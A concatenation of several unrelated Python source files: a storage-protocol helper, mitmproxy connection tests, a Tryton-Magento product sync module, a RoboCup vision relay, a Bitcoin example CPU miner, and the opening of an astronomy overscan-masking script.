raise NotImplementedError("Unknown protocol %s (%s)" %
(protocol, urlpath))
def ensure_protocol(protocol):
if (protocol not in ('s3', 'hdfs') and ((protocol in _read_bytes)
or (protocol in _open_files))):
return
if protocol == 's3':
import_required('s3fs',
"Need to install `s3fs` library for s3 support\n"
" conda install s3fs -c conda-forge\n"
" or\n"
" pip install s3fs")
elif protocol == 'hdfs':
msg = ("Need to install `distributed` and `hdfs3` "
"for HDFS support\n"
" conda install distributed hdfs3 -c conda-forge")
import_required('distributed.hdfs', msg)
import_required('hdfs3', msg)
else:
raise ValueError("Unknown protocol %s" % protocol)
| |
import socket
import os
import threading
import ssl
import OpenSSL
import pytest
from unittest import mock
from mitmproxy import connections
from mitmproxy import exceptions
from mitmproxy.net import tcp
from mitmproxy.net.http import http1
from mitmproxy.test import tflow
from mitmproxy.test import tutils
from .net import tservers
from pathod import test
class TestClientConnection:
def test_send(self):
c = tflow.tclient_conn()
c.send(b'foobar')
c.send([b'foo', b'bar'])
with pytest.raises(TypeError):
c.send('string')
with pytest.raises(TypeError):
c.send(['string', 'not'])
assert c.wfile.getvalue() == b'foobarfoobar'
def test_repr(self):
c = tflow.tclient_conn()
assert 'address:22' in repr(c)
assert 'ALPN' in repr(c)
assert 'TLS' not in repr(c)
c.alpn_proto_negotiated = None
c.tls_established = True
assert 'ALPN' not in repr(c)
assert 'TLS' in repr(c)
def test_tls_established_property(self):
c = tflow.tclient_conn()
c.tls_established = True
assert c.ssl_established
assert c.tls_established
c.tls_established = False
assert not c.ssl_established
assert not c.tls_established
def test_make_dummy(self):
c = connections.ClientConnection.make_dummy(('foobar', 1234))
assert c.address == ('foobar', 1234)
def test_state(self):
c = tflow.tclient_conn()
assert connections.ClientConnection.from_state(c.get_state()).get_state() == \
c.get_state()
c2 = tflow.tclient_conn()
c2.address = (c2.address[0], 4242)
assert not c == c2
c2.timestamp_start = 42
c.set_state(c2.get_state())
assert c.timestamp_start == 42
c3 = c.copy()
assert c3.get_state() == c.get_state()
class TestServerConnection:
def test_send(self):
c = tflow.tserver_conn()
c.send(b'foobar')
c.send([b'foo', b'bar'])
with pytest.raises(TypeError):
c.send('string')
with pytest.raises(TypeError):
c.send(['string', 'not'])
assert c.wfile.getvalue() == b'foobarfoobar'
def test_repr(self):
c = tflow.tserver_conn()
c.sni = 'foobar'
c.tls_established = True
c.alpn_proto_negotiated = b'h2'
assert 'address:22' in repr(c)
assert 'ALPN' in repr(c)
assert 'TLS: foobar' in repr(c)
c.sni = None
c.tls_established = True
c.alpn_proto_negotiated = None
assert 'ALPN' not in repr(c)
assert 'TLS' in repr(c)
c.sni = None
c.tls_established = False
assert 'TLS' not in repr(c)
def test_tls_established_property(self):
c = tflow.tserver_conn()
c.tls_established = True
assert c.ssl_established
assert c.tls_established
c.tls_established = False
assert not c.ssl_established
assert not c.tls_established
def test_make_dummy(self):
c = connections.ServerConnection.make_dummy(('foobar', 1234))
assert c.address == ('foobar', 1234)
def test_simple(self):
d = test.Daemon()
c = connections.ServerConnection((d.IFACE, d.port))
c.connect()
f = tflow.tflow()
f.server_conn = c
f.request.path = "/p/200:da"
# use this protocol just to assemble - not for actual sending
c.wfile.write(http1.assemble_request(f.request))
c.wfile.flush()
assert http1.read_response(c.rfile, f.request, 1000)
assert d.last_log()
c.finish()
d.shutdown()
def test_terminate_error(self):
d = test.Daemon()
c = connections.ServerConnection((d.IFACE, d.port))
c.connect()
c.connection = mock.Mock()
c.connection.recv = mock.Mock(return_value=False)
c.connection.flush = mock.Mock(side_effect=exceptions.TcpDisconnect)
c.finish()
d.shutdown()
def test_sni(self):
c = connections.ServerConnection(('', 1234))
with pytest.raises(ValueError, matches='sni must be str, not '):
c.establish_ssl(None, b'foobar')
class TestClientConnectionTLS:
@pytest.mark.parametrize("sni", [
None,
"example.com"
])
def test_tls_with_sni(self, sni):
address = ('127.0.0.1', 0)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(address)
sock.listen()
address = sock.getsockname()
def client_run():
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
s = socket.create_connection(address)
s = ctx.wrap_socket(s, server_hostname=sni)
s.send(b'foobar')
s.shutdown(socket.SHUT_RDWR)
threading.Thread(target=client_run).start()
connection, client_address = sock.accept()
c = connections.ClientConnection(connection, client_address, None)
cert = tutils.test_data.path("mitmproxy/net/data/server.crt")
key = OpenSSL.crypto.load_privatekey(
OpenSSL.crypto.FILETYPE_PEM,
open(tutils.test_data.path("mitmproxy/net/data/server.key"), "rb").read())
c.convert_to_ssl(cert, key)
assert c.connected()
assert c.sni == sni
assert c.tls_established
assert c.rfile.read(6) == b'foobar'
c.finish()
class TestServerConnectionTLS(tservers.ServerTestBase):
ssl = True
class handler(tcp.BaseHandler):
def handle(self):
self.finish()
@pytest.mark.parametrize("clientcert", [
None,
tutils.test_data.path("mitmproxy/data/clientcert"),
os.path.join(tutils.test_data.path("mitmproxy/data/clientcert"), "client.pem"),
])
def test_tls(self, clientcert):
c = connections.ServerConnection(("127.0.0.1", self.port))
c.connect()
c.establish_ssl(clientcert, "foo.com")
assert c.connected()
assert c.sni == "foo.com"
assert c.tls_established
c.close()
c.finish()
| |
# -*- coding: UTF-8 -*-
import magento
from collections import defaultdict
import logbook
from trytond.model import ModelSQL, ModelView, fields
from trytond.transaction import Transaction
from trytond.pool import PoolMeta, Pool
from trytond.pyson import Eval
from decimal import Decimal
__all__ = [
'Category', 'MagentoInstanceCategory', 'Product',
'ProductSaleChannelListing',
'ProductPriceTier',
]
__metaclass__ = PoolMeta
log = logbook.Logger('magento', logbook.INFO)
def batch(iterable, n=1):
l = len(iterable)
for ndx in range(0, l, n):
yield iterable[ndx:min(ndx + n, l)]
class Category:
"Product Category"
__name__ = "product.category"
magento_ids = fields.One2Many(
'magento.instance.product_category', 'category',
'Magento IDs', readonly=True,
)
@classmethod
def create_tree_using_magento_data(cls, category_tree):
"""
Create the categories from the category tree
:param category_tree: Category Tree from Magento
"""
# Create the root
root_category = cls.find_or_create_using_magento_data(
category_tree
)
for child in category_tree['children']:
cls.find_or_create_using_magento_data(
child, parent=root_category
)
if child['children']:
cls.create_tree_using_magento_data(child)
@classmethod
def find_or_create_using_magento_data(
cls, category_data, parent=None
):
"""
Find or Create category using Magento Database
:param category_data: Category Data from Magento
:param parent: Browse record of Parent if present, else None
:returns: Active record of category found/created
"""
category = cls.find_using_magento_data(
category_data
)
if not category:
category = cls.create_using_magento_data(
category_data, parent
)
return category
@classmethod
def find_or_create_using_magento_id(
cls, magento_id, parent=None
):
"""
Find or Create Category Using Magento ID of Category
:param category_data: Category Data from Magento
:param parent: Browse record of Parent if present, else None
:returns: Active record of category found/created
"""
Channel = Pool().get('sale.channel')
category = cls.find_using_magento_id(magento_id)
if not category:
channel = Channel.get_current_magento_channel()
with magento.Category(
channel.magento_url, channel.magento_api_user,
channel.magento_api_key
) as category_api:
category_data = category_api.info(magento_id)
category = cls.create_using_magento_data(
category_data, parent
)
return category
@classmethod
def find_using_magento_data(cls, category_data):
"""
Find category using Magento Data
:param category_data: Category Data from Magento
:returns: Active record of category found or None
"""
MagentoCategory = Pool().get('magento.instance.product_category')
records = MagentoCategory.search([
('magento_id', '=', int(category_data['category_id'])),
('channel', '=', Transaction().context['current_channel'])
])
return records and records[0].category or None
@classmethod
def find_using_magento_id(cls, magento_id):
"""
Find category using Magento ID or Category
:param magento_id: Category ID from Magento
:type magento_id: Integer
:returns: Active record of Category Found or None
"""
MagentoCategory = Pool().get('magento.instance.product_category')
records = MagentoCategory.search([
('magento_id', '=', magento_id),
('channel', '=', Transaction().context['current_channel'])
])
return records and records[0].category or None
@classmethod
def create_using_magento_data(cls, category_data, parent=None):
"""
Create category using magento data
:param category_data: Category Data from magento
:param parent: Browse record of Parent if present, else None
:returns: Active record of category created
"""
category, = cls.create([{
'name': category_data['name'],
'parent': parent,
'magento_ids': [('create', [{
'magento_id': int(category_data['category_id']),
'channel': Transaction().context['current_channel'],
}])],
}])
return category
class MagentoInstanceCategory(ModelSQL, ModelView):
"""
Magento Instance - Product Category Store
This model keeps a record of a category's association with an Instance
and the ID of the category on that channel
"""
__name__ = "magento.instance.product_category"
magento_id = fields.Integer(
'Magento ID', readonly=True, required=True, select=True
)
channel = fields.Many2One(
'sale.channel', 'Magento Instance', readonly=True,
required=True, select=True
)
category = fields.Many2One(
'product.category', 'Product Category', readonly=True,
required=True, select=True
)
@classmethod
def __setup__(cls):
'''
Setup the class and define constraints
'''
super(MagentoInstanceCategory, cls).__setup__()
cls._sql_constraints += [
(
'magento_id_instance_unique',
'UNIQUE(magento_id, channel)',
'Each category in an channel must be unique!'
)
]
class ProductSaleChannelListing:
"Product Sale Channel"
__name__ = 'product.product.channel_listing'
price_tiers = fields.One2Many(
'product.price_tier', 'product_listing', 'Price Tiers'
)
magento_product_type = fields.Selection(
[
(None, ''),
('simple', 'Simple'),
('configurable', 'Configurable'),
('grouped', 'Grouped'),
('bundle', 'Bundle'),
('virtual', 'Virtual'),
('downloadable', 'Downloadable'),
], 'Magento Product Type', readonly=True, states={
"invisible": Eval('channel_source') != 'magento'
}, depends=['channel_source']
)
@classmethod
def __setup__(cls):
super(ProductSaleChannelListing, cls).__setup__()
cls._error_messages.update({
'multi_inventory_update_fail':
"FaultCode: %s, FaultMessage: %s",
})
@classmethod
def create_from(cls, channel, product_data):
"""
Create a listing for the product from channel and data
"""
Product = Pool().get('product.product')
if channel.source != 'magento':
return super(ProductSaleChannelListing, cls).create_from(
channel, product_data
)
try:
product, = Product.search([
('code', '=', product_data['sku']),
])
except ValueError:
cls.raise_user_error("No product found for mapping")
listing = cls(
channel=channel,
product=product,
# Do not match with SKU. Magento fucks up when there are
# numeric SKUs
product_identifier=product_data['product_id'],
magento_product_type=product_data['type'],
)
listing.save()
return listing
def export_inventory(self):
"""
Export inventory of this listing
"""
if self.channel.source != 'magento':
return super(ProductSaleChannelListing, self).export_inventory()
return self.export_bulk_inventory([self])
@classmethod
def export_bulk_inventory(cls, listings):
"""
Bulk export inventory to magento.
Do not rely on the return value from this method.
"""
SaleChannelListing = Pool().get('product.product.channel_listing')
if not listings:
# Nothing to update
return
non_magento_listings = cls.search([
('id', 'in', map(int, listings)),
('channel.source', '!=', 'magento'),
])
if non_magento_listings:
super(ProductSaleChannelListing, cls).export_bulk_inventory(
non_magento_listings
)
magento_listings = filter(
lambda l: l not in non_magento_listings, listings
)
log.info(
"Fetching inventory of %d magento listings"
% len(magento_listings)
)
inventory_channel_map = defaultdict(list)
for listing in magento_listings:
channel = listing.channel
product_data = {
'qty': listing.quantity,
}
# TODO: Get this from availability used
if listing.magento_product_type == 'simple':
# Only send inventory for simple products
product_data['is_in_stock'] = '1' \
if listing.quantity > 0 else '0'
else:
# configurable, bundle and everything else
product_data['is_in_stock'] = '1'
# group inventory xml by channel
inventory_channel_map[channel].append([
listing.product_identifier, product_data
])
for channel, product_data_list in inventory_channel_map.iteritems():
with magento.Inventory(
channel.magento_url,
channel.magento_api_user,
channel.magento_api_key) as inventory_api:
for product_data_batch in batch(product_data_list, 50):
log.info(
"Pushing inventory of %d products to magento"
% len(product_data_batch)
)
response = inventory_api.update_multi(product_data_batch)
# Magento bulk API will not raise Faults.
# Instead the response contains the faults as a dict
for i, result in enumerate(response):
if result is not True:
if result.get('isFault') is True and \
result['faultCode'] == '101':
listing, = SaleChannelListing.search([
('product_identifier', '=', product_data_batch[i][0]), # noqa
('channel', '=', channel.id),
])
listing.state = 'disabled'
listing.save()
else:
cls.raise_user_error(
'multi_inventory_update_fail',
(result['faultCode'], result['faultMessage']) # noqa
)
class Product:
"Product"
__name__ = "product.product"
@classmethod
def __setup__(cls):
"""
Setup the class before adding to pool
"""
super(Product, cls).__setup__()
cls._error_messages.update({
"invalid_category": 'Category "%s" must have a magento category '
'associated',
"invalid_product": 'Product "%s" already has a magento product '
'associated',
"missing_product_code": 'Product "%s" has a missing code.',
})
@classmethod
def find_or_create_using_magento_data(cls, product_data):
"""
Find or create a product template using magento data provided.
This method looks for an existing template using the magento ID From
data provided. If found, it returns the template found, else creates
a new one and returns that
:param product_data: Product Data From Magento
:returns: Browse record of product found/created
"""
Product = Pool().get('product.product')
Listing = Pool().get('product.product.channel_listing')
Channel = Pool().get('sale.channel')
channel = Channel.get_current_magento_channel()
products = Product.search([
('code', '=', product_data['sku']),
])
listings = Listing.search([
('product.code', '=', product_data['sku']),
('channel', '=', channel)
])
if not products:
product = Product.create_from(channel, product_data)
else:
product, = products
if not listings:
Listing.create_from(channel, product_data)
return product
@classmethod
def extract_product_values_from_data(cls, product_data):
"""
Extract product values from the magento data, used for both
creation/updation of product. This method can be overwritten by
custom modules to store extra info to a product
:param: product_data
:returns: Dictionary of values
"""
Channel = Pool().get('sale.channel')
channel = Channel.get_current_magento_channel()
values = {
'name': product_data.get('name') or
('SKU: ' + product_data.get('sku')),
'default_uom': channel.default_uom.id,
'salable': True,
'sale_uom': channel.default_uom.id,
}
if product_data['type'] in ('downloadable', 'virtual'):
values['type'] = 'service'
return values
@classmethod
def create_from(cls, channel, product_data):
"""
Create the product for the channel
"""
if channel.source != 'magento':
return super(Product, cls).create_from(channel, product_data)
return cls.create_using_magento_data(product_data)
@classmethod
def create_using_magento_data(cls, product_data):
"""
Create a new product with the `product_data` from magento.This method
also looks for the category of the product. If found, it uses that
category to assign the product to. If no category is found, it assigns
the product to `Unclassified Magento Product` category
:param product_data: Product Data from Magento
:returns: Browse record of product created
"""
# TODO: Remove this method completely and stick to the channel API
# The method above (create_from) should be used instead.
Template = Pool().get('product.template')
Category = Pool().get('product.category')
# Get only the first category from the list of categories
# If no category is found, put product under unclassified category
# which is created by default data
if product_data.get('categories'):
category = Category.find_or_create_using_magento_id(
int(product_data['categories'][0])
)
else:
categories = Category.search([
('name', '=', 'Unclassified Magento Products')
])
category = categories[0]
product_template_values = cls.extract_product_values_from_data(
product_data
)
product_template_values.update({
'products': [('create', [{
'description': product_data.get('description'),
'code': product_data['sku'],
'list_price': Decimal(
product_data.get('special_price') or
product_data.get('price') or
0.00
),
'cost_price': Decimal(product_data.get('cost') or 0.00),
}])],
'category': category.id,
})
product_template, = Template.create([product_template_values])
return product_template.products[0]
def update_from_magento(self):
"""
Update product using magento ID for that product
:returns: Active record of product updated
"""
Channel = Pool().get('sale.channel')
SaleChannelListing = Pool().get('product.product.channel_listing')
channel = Channel.get_current_magento_channel()
with magento.Product(
channel.magento_url, channel.magento_api_user,
channel.magento_api_key
) as product_api:
channel_listing, = SaleChannelListing.search([
('product', '=', self.id),
('channel', '=', channel.id),
])
product_data = product_api.info(
channel_listing.product_identifier,
identifierType="productID"
)
return self.update_from_magento_using_data(product_data)
def update_from_magento_using_data(self, product_data):
"""
Update product using magento data
:param product_data: Product Data from magento
:returns: Active record of product updated
"""
Template = Pool().get('product.template')
product_template_values = self.extract_product_values_from_data(
product_data
)
product_template_values.update({
'products': [('write', [self], {
'description': product_data.get('description'),
'code': product_data['sku'],
'list_price': Decimal(
product_data.get('special_price') or
product_data.get('price') or
0.00
),
'cost_price': Decimal(product_data.get('cost') or 0.00),
})]
})
Template.write([self.template], product_template_values)
return self
def get_product_values_for_export_to_magento(self, categories, channels):
"""Creates a dictionary of values which have to exported to magento for
creating a product
:param categories: List of Browse record of categories
:param channels: List of Browse record of channels
"""
return {
'categories': map(
lambda mag_categ: mag_categ.magento_id,
categories[0].magento_ids
),
'websites': map(lambda c: c.magento_website_id, channels),
'name': self.name,
'description': self.description or self.name,
'short_description': self.description or self.name,
'status': '1',
'visibility': '4',
'price': float(str(self.list_price)),
'tax_class_id': '1', # FIXME
}
class ProductPriceTier(ModelSQL, ModelView):
"""Price Tiers for product
This model stores the price tiers to be used while sending
tier prices for a product from Tryton to Magento.
"""
__name__ = 'product.price_tier'
_rec_name = 'quantity'
product_listing = fields.Many2One(
'product.product.channel_listing', 'Product Listing', required=True,
readonly=True,
)
quantity = fields.Float(
'Quantity', required=True
)
price = fields.Function(fields.Numeric('Price'), 'get_price')
@classmethod
def __setup__(cls):
"""
Setup the class before adding to pool
"""
super(ProductPriceTier, cls).__setup__()
cls._sql_constraints += [
(
'product_listing_quantity_unique',
'UNIQUE(product_listing, quantity)',
'Quantity in price tiers must be unique for a product listing'
)
]
def get_price(self, name):
"""Calculate the price of the product for quantity set in record
:param name: Name of field
"""
Channel = Pool().get('sale.channel')
if not Transaction().context.get('current_channel'):
return 0
channel = Channel.get_current_magento_channel()
product = self.product_listing.product
return channel.price_list.compute(
None, product, product.list_price, self.quantity,
channel.default_uom
)
| |
# Python Imports
import threading
import Queue
import sys
import optparse
import struct
import socket
import os
# Project Imports
import messages
import proto.messages_robocup_ssl_wrapper_pb2 as ssl_wrapper
# Library Imports
import pyinotify
X_SHIFT = 121.92;
Y_SHIFT = 121.92/2.0;
SCALE = 0.1;
class FieldUpdateConsumer(threading.Thread):
"""
Grabs new SSL_DetectionFrame packets off its queue and sends them for
processing until its told to stop
"""
def start(self):
self._lock = threading.Lock()
self._running = True
# Infinite size FIFO queue (insertion never blocks)
self._queue = Queue.Queue(maxsize = 0)
# Start thread
threading.Thread.start(self)
def running(self):
running = None
self._lock.acquire()
running = self._running
self._lock.release()
return running
def set_running(self, running):
self._lock.acquire()
self._running = running
self._lock.release()
def put(self,frame):
self._queue.put_nowait(frame)
def run(self):
while self.running():
frame = None
try:
# Wait on an frame
frame = self._queue.get(block = True, timeout = 0.1)
# Empty the queue leaving us with the last (and most recent
# frame)
while not self._queue.empty():
frame = self._queue.get_nowait()
except Queue.Empty:
pass
# Now lets process this frame, only if we are still running
if self.running():
if frame is not None:
self.process_frame(frame)
def process_frame(self, frame):
"""
Over ride this to process frame events
"""
pass
class DebugConsumer(FieldUpdateConsumer):
"""
Grabs frames and prints them
"""
def process_frame(self, frame):
#print messages.FieldInfo(frame,X_SHIFT,Y_SHIFT,SCALE)
pass
class BluetoothConsumer(FieldUpdateConsumer):
"""
Consumes frames and writes out on the given port
"""
def start(self, devfile, testmode = False):
if not testmode:
self.port = self._open_port(devfile)
else:
self.port = open(devfile,'w')
FieldUpdateConsumer.start(self)
def process_frame(self, frame):
if self.port is not None:
self.port.write(struct.pack('BB',255,255))
self.port.write(data)
field_info = messages.FieldInfo(frame,X_SHIFT,Y_SHIFT,SCALE)
field_info.send_data(self.port)
self.port.flush()
def _open_port(devfile):
port = serial.Serial()
port.setPort(devfile)
port.setBaudrate(9600)
port.setStopbits(1)
port.setByteSize(8)
port.setTimeout(500)
port.setParity('N')
port.open()
return port
class ConsumerPool(object):
"""
Manages all our consumer threads which push data to serial port or screen
"""
def __init__(self):
self._lock = threading.Lock()
self._consumers = []
def add_consumer(self, consumer):
self._lock.acquire()
self._consumers.append(consumer)
self._lock.release()
def remove_consumer(self, consumer):
self._lock.acquire()
self._consumers.remove(consumer)
self._lock.release()
def stop_all(self):
self._lock.acquire()
for consumer in self._consumers:
consumer.set_running(False)
self._lock.release()
def join_all(self):
self._lock.acquire()
for consumer in self._consumers:
consumer.join()
self._lock.release()
def put(self, frame):
self._lock.acquire()
for consumer in self._consumers:
consumer.put(frame)
self._lock.release()
class BluetoothDevWatcher(pyinotify.ProcessEvent):
"""
Watches the device directory, and create BluetoothConsumers for new devices
"""
def __init__(self, prefix, pool, testmode = False):
pyinotify.ProcessEvent.__init__(self)
self._pool = pool
self._prefix = prefix
self._blueConsumers = {}
self._testmode = testmode
def process_IN_CREATE(self, event):
full_path = os.path.join(event.path, event.name)
if full_path.startswith(self._prefix):
print "Connecting to:",full_path
# Create and store the consumer for future shutdown
blue_con = BluetoothConsumer()
self._blueConsumers[full_path] = blue_con
# Start up and add to the pool
blue_con.start(full_path, self._testmode)
self._pool.add_consumer(blue_con)
def process_IN_DELETE(self, event):
"""
Tries to find the currently created consumer for this device and
shut it down if needed
"""
full_path = os.path.join(event.path, event.name)
if full_path in self._blueConsumers:
print "Removing:",full_path
blue_con = self._blueConsumers[full_path]
blue_con.set_running(False)
self._pool.remove_consumer(blue_con)
blue_con.join()
def open_mcast_socket(ip_addr_str, port):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('', port))
mreq = struct.pack("=4sl", socket.inet_aton(ip_addr_str), socket.INADDR_ANY)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
return sock
def main(argv=None):
if argv is None:
argv = sys.argv
# Parse arguments
parser = optparse.OptionParser()
parser.set_defaults(host="224.5.23.2", port= 10002, testmode=False,
devprefix='/dev/rfcomm')
parser.add_option("-H", "--host", dest="hostname",
type="string", help="specify UDP multicast ip address")
parser.add_option("-p", "--port", dest="portnum",
type="int", help="port number to run on")
parser.add_option("-t", "--test", dest="testmode", action="store_true",
help="Enables writing to normal file")
parser.add_option("-d","--devprefix", dest="devprefix", type="string",
help="The prefix for the files that are watched")
(options, args) = parser.parse_args()
# Open up the UDP multicast
sock = open_mcast_socket(options.host, options.port)
# Consumer pool
pool = ConsumerPool()
# Create the debug consumer
debug = DebugConsumer()
pool.add_consumer(debug)
# Create the watcher
mask = pyinotify.EventsCodes.IN_DELETE | pyinotify.EventsCodes.IN_CREATE
wm = pyinotify.WatchManager()
blueWatcher = BluetoothDevWatcher(options.devprefix, pool,
testmode = options.testmode)
notifier = pyinotify.ThreadedNotifier(wm, blueWatcher)
watchdir, fileprefix = os.path.split(options.devprefix)
wdd = wm.add_watch(watchdir, mask, rec=False)
# Start the theads!!
notifier.start()
debug.start()
wrapper_packet = ssl_wrapper.SSL_WrapperPacket()
try:
while 1:
data, sender = sock.recvfrom(1500)
wrapper_packet.ParseFromString(data)
frame = wrapper_packet.detection
pool.put(frame)
except KeyboardInterrupt:
pool.stop_all()
pool.join_all()
if __name__ == "__main__":
sys.exit(main())
| |
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 4567
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
| |
#!/usr/bin/env python
################
# @file maskBadOverscans.py
# @author Douglas Applegate
# @date 2/14/07 (Vday - what a lame day)
#
# @brief Checks the overscan region of an image
# for electron bleedthrough from an image obj (ie star)
# near the edge. Creates a mask with the appropriate row eliminated
################
__cvs_id__ = "$Id: maskBadOverscans.py,v 1.4 2008-07-09 01:22:15 dapple Exp $"
########################################################################
usage = \
'''
maskBadOverscans.py maindir workdir prefix [options]
ex: maskBadOverscans.py /path/to/date_filter SCIENCE SUPA
or
maskBadOverscans.py test
'''
########################################################################
import astropy, astropy.io.fits as pyfits, re, unittest, sys, os, numpy, math, glob
import bashreader, leastsq, TestBadOverscansTestData, regionfile
from optparse import OptionParser
########################################################################
import BonnLogger
########################################################################
########################################################################
# UTILITY CLASSES
#################
class NothingToDoException(Exception): pass
class NoInstrumentException(Exception): pass
class BadInstrumentFileException(Exception): pass
########################################################################
class OverscanInfo(dict):
'''class OverscanInfo
Extracts relevant info about the size & shape
of the overscan region from a dictionary-interfaced object.
'''
def __init__(self, config = None):
'''@param config a dictionary-interfaced object
config should have entries 'ovscan[x|y]',
and 'cut[x|y]
'''
self.directionIsX = None
if config is not None:
self.readConfig(config)
###
def __str__(self):
astr = "OverscanInfo:\n"
if self.isXDirection():
astr += "\tDirection: X\n"
else:
astr += "\tDirection: Y\n"
for chip, chipData in self.iteritems():
astr += "\tChip %d: %s\n" % (chip, chipData)
return astr
###
def setXOverscanDir(self):
self.directionIsX = True
def setYOverscanDir(self):
self.directionIsX = False
def isYDirection(self):
return not self.directionIsX
def isXDirection(self):
return self.directionIsX
###
def isInitialized(self):
if self.directionIsX == None:
return False
for chip in self.itervalues():
for entry in chip.iteritems():
if entry is None:
return False
return True
###
def addChip(self, chipId):
if chipId not in self:
self[chipId] = {'min':None,
'max':None,
'offset':None}
###
def setMin(self, chipId, min):
self[chipId]['min'] = min
def getMin(self, chipId):
return self[chipId]['min']
def setMax(self, chipId, max):
self[chipId]['max'] = max+1
def getMax(self, chipId):
return self[chipId]['max']
###
def setOffset(self, chipId, offset):
self[chipId]['offset'] = offset
